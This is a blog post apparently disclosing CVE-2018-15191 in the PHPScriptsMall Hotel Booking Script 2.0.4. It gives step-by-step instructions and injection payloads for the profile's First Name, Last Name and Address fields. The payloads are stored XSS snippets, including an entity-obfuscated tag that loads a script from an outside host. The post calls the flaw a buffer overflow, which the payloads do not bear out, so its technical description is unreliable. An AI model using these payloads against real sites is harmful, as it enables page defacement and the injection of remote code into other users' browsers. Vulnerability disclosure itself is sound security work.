Home > CVE > CVE-2018-15191 : Hotel Booking Script – 2.0.4 – has Buffer Overflow Vulnerability

CVE-2018-15191 : Hotel Booking Script – 2.0.4 – has Buffer Overflow Vulnerability

CVE-2018-15191

I found that specified PHPSCRIPTSMALL-Hotel Booking Script – 2.0.4 – has Buffer Overflow Vulnerability via First name , Last name and Address . To exploit this vulnerability, the following steps were taken.

VENDOR SUMMARY :- PHP Scripts Mall Pvt. Ltd. is a professional software selling portal offering wide range of innovative.
PHP Scripts Mall is a leading business and technology firm with 12 years of successful track record
in completion and implementation of numerous projects in various verticals and domains..
It has 300 plus PHP scripts ready to buy.

DESCRIPTION :- Buffer Overflow Vulnerability are found in Specified Vendor .
By uploading these types of malicious code an attacker can change or redirect the admin or guest user
to any infectious link or also can harm the full site by changing site interface.


Step 1- Go to the Vendor Product Link “ https://www.phpscriptsmall.com/product/hotel-booking-script/ ” or CLICK HERE

Step 2- Select => SIGN UP/IN => REGISTER=> and then fill the Form Click on REGISTER.

CVE-2018-15191
CVE-2018-15191

CVE-2018-15191

Step 3-Goto your mail and Verify it.

CVE-2018-15191

Step 4-Now come back to site and Sign in using your Verified mail and Password.

Step 5-Select Profile=> Edit Profile and paste these Code in given parameter.

CVE-2018-15191
CVE-2018-15191

In First Name=>
< *div id=d> < *script>d.innerHTML=d.innerHTML

In Last Name =>
< *a href=”data:text/html;blabla,<script src=”htt&
#112://sternefamil&#
121.net/foo.js”></scr&
#105pt>​”>*Vikas Chaudhary

In Address =>
< *div id=”div1″>< *input value=”“onmouseover=javascript:alert(1)”> < *div id=”div2″>


and click on SUBMIT



[ Note=> Remove * from script]

Step 6- Now you will see that your web interface will be changed and you can’t be able to change your or edit your Profile .

CVE-2018-15191
CVE-2018-15191

My Previous CVE (Visit Once)…
ALL CVE

CVE-2018-15190

CVE-2018-14541


CVE-2018-14082

CVE-2018-13256

>>> CONTACT US <<<



Summary
Article Name=>
CVE-2018-15191
Description=>
I found that specified PHPSCRIPTSMALL-Hotel Booking Script – 2.0.4 – has Buffer Overflow Vulnerability
Author=>
Publisher Name=>
www.gkaim.com
Admin
Welcome Sir, .. Myself Vikas Chaudhary , i was interested in general knowledge since childhood , so i thought why not to share my knowledge with you, that's why i created this educational blog. Here you find world wide general knowledge of all Latest technology , Science & History Que , and Mysterious fact of the world. Here you also find knowledge about cyber security. Thanks for visit.. keep supporting....keep Loving
https://www.gkaim.com

6 thoughts on “CVE-2018-15191 : Hotel Booking Script – 2.0.4 – has Buffer Overflow Vulnerability

Leave a Reply

Your email address will not be published.

%d bloggers like this:
\